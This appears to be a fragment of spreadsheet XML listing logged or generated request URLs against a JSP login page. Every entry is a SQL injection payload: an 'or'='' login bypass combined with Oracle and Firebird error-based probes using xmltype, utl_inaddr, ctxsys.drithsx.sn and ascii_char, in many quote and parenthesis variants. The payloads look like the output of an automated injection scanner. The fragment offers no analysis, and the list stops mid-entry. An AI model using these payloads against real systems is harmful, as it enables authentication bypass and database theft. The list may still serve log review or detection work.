  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and"napl"="napl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and("abvx"like"abvx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and(("tulc"like"tulc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and((("xfhj"like"xfhj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5334=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5334=5334)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)and"bvxf"like"bvxf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(9282=9282</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((5428=5428</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(((4280=4280</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and('viyn'='viyn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(('homo'='homo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((('oasc'='oasc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and'hqfj'='hqfj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and('wdks'like'wdks</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(('efro'like'efro</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((('joje'like'joje</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and'bclm'like'bclm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and("fbwm"="fbwm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(("jank"="jank</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((("ftkv"="ftkv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and"zwzz"="zwzz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and("teqi"like"teqi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(("kkik"like"kkik</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((("jfdu"like"jfdu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and8402=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8402=8402)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and"vqof"like"vqof</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(2181=2181</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((3177=3177</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(((3184=3184</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and('kzrf'='kzrf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(('nntj'='nntj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((('silm'='silm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and'zjbq'='zjbq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and('yzpp'like'yzpp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(('vvef'like'vvef</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((('ptpl'like'ptpl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and'rned'like'rned</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and("ayhd"="ayhd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(("wqwz"="wqwz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((("yneh"="yneh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and"mvwi"="mvwi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and("ueae"like"ueae</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(("adgc"like"adgc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((("uiaz"like"uiaz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and8849=ctxsys.drithsx.sn(8849,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8849=8849)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and"bdan"like"bdan</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(3282=3282</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((2677=2677</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(((3878=3878</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and('extk'='extk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(('nebw'='nebw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((('gqlt'='gqlt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and'tqgm'='tqgm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and('tuor'like'tuor</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(('ijzo'like'ijzo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((('heyj'like'heyj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and'dkuu'like'dkuu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and("cctk"="cctk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(("gghm"="gghm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((("jzdv"="jzdv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and"dugb"="dugb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and("oxjh"like"oxjh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(("gvti"like"gvti</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and5108=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase5108when5108then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((("rdkr"like"rdkr</t>
  </si>
  <si>
